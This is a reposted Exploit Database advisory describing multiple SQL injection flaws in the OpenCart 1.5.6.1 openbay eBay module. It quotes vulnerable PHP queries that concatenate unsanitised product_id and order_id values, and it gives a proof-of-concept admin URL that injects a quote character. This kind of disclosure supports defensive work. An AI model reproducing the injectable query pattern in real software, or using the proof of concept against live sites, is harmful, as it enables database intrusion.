OpenCart 1.5.6.1 – ‘openbay’ Multiple SQL Injections

• Exploit Database
• 113 阅读

• 作者： Saadi Siddiqui
  日期： 2014-03-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32520/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  # Exploit Title : OpenCart <= 1.5.6.1 SQL Injection # Date: 2014/3/26 # Exploit Author: Saadat Ullah ， saadi_linux@rocketmail.com # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web: www.opencart.com # Author HomePage : http://security-geeks.blogspot.com/ # Tested on: Server : Apache/2.2.15 PHP/5.3.3   #Opencart suffers from multipe SQL injection in ebay.php the bug is more about privilege escalation as attacker may need openbay module access .   Poc Poorly coded file full of SQLi opencart/system/library/ebay.php In file opencart/system/library/ebay.php product_id is used in a SQL query without being sanitize.   public function getEbayItemId($product_id) { $this->log(&apos;getEbayItemId() - Product ID: &apos;.$product_id);   $qry = $this->db->query("SELECT <code>ebay_item_id</code> FROM <code>" . DB_PREFIX . "ebay_listing</code> WHERE <code>product_id</code> = &apos;".$product_id."&apos; AND <code>status</code> = &apos;1&apos; LIMIT 1"); .............. Function is called on many locations and paramter is passed without santize. In opencart\admin\controller\openbay\openbay.php public function editLoad() { ... $item_id= $this->openbay->ebay->getEbayItemId($this->request->get[&apos;product_id&apos;]); .............. Where $this->request->get[&apos;product_id&apos;] comming from GET field. Similarly More   public function isEbayOrder($id) { ... $qry = $this->db->query("SELECT <code>comment</code> FROM <code>" . DB_PREFIX . "order_history</code> WHERE <code>comment</code> LIKE &apos;[eBay Import:%]&apos; AND <code>order_id</code> = &apos;".$id."&apos; LIMIT 1");   In opencart\admin\controller\extension\openbay.php public function ajaxOrderInfo() ... if($this->openbay->ebay->isEbayOrder($this->request->get[&apos;order_id&apos;]) !== false){ .............. More public function getProductStockLevel($productId, $sku = &apos;&apos;) { ... $qry = $this->db->query("SELECT <code>quantity</code>, <code>status</code> FROM <code>" . DB_PREFIX . "product</code> WHERE <code>product_id</code> = &apos;".$productId."&apos; LIMIT 1"); .............. ebay.php has many more.. User should have openbay module access http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1&apos;   #Independent Pakistani Security Researcher